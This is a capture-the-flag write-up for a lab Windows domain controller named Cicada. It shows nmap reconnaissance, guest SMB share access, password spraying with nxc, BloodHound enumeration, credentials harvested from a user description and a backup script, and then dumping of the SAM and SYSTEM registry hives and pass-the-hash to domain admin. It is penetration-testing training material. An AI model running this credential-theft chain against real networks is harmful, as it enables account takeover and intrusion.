Cicada - Writeup
Cicada
Reconnaissance
IP: 10.10.11.35
NMAP
nmap -T4 -p- -A 10.10.11.35
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 12:03 EDT
Nmap scan report for 10.10.11.35
Host is up (0.030s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-26 23:05:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-26T23:07:22+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-26T23:07:22+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-26T23:07:22+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: 2025-08-26T23:07:22+00:00; +6h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
60955/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-time:
| date: 2025-08-26T23:06:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 29.73 ms 10.10.14.1
2 30.06 ms 10.10.11.35
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 217.06 seconds
From nmap scan we know that is AD
SMB
smbclient \\\\10.10.11.35\\HR
smb allow guest account and we found notice from hr txt file
if this file we can see default password to domain: Cicada$M6Corpb*@Lp#nZp!8
Tried to enumerate users via rpc and ldap but I didn’t get hit, but I manage to get users via smb
cat users.txt | awk '{sub(/.*\\/, "", $6); print $6}'
fast cut users and tried with this list and default password.
nxc smb CICADA-DC -u usernames.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
we got 1 hit from michael user.
nxc smb CICADA-DC -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'
Now let’s collect bloodhound info and load it into app
bloodhound-python -d cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -ns 10.10.11.35 -c all
In bloodhound I found credentials in description for david user
DAVID.ORELIOUS aRt$Lp#7t*VQ!3
confirm it via nxc
BTW you can find this creds only adding -users to nxc command :D
enumerating with david credentials I found that david can read Dev share let’s check it:
After downloading script I found new cred saved in backup.ps1
emily.oscars Q!3@Lp#M6b*7t*Vt
Fast check for emily in bloodhound gave me information that emily is in backup operators group
emily have access via winrm which nxc confirm
in emily desktop we can take user flag and searching for priv esc.
Privilege Escalation
We know that emily is backup operators so start with whoami /priv
we have SeBackupPrivilege so easy peasy!
reg save hklm\sam sam
reg save hklm\system system
download sam
download system
Fast sam dump and we are in home
Just pass the hash attack and we are in domain admin account:
Simply navigate to C:\Users\Administrator\desktop\root.txt to get a flag. Also tried dump with nxc but didn’t work dunno why.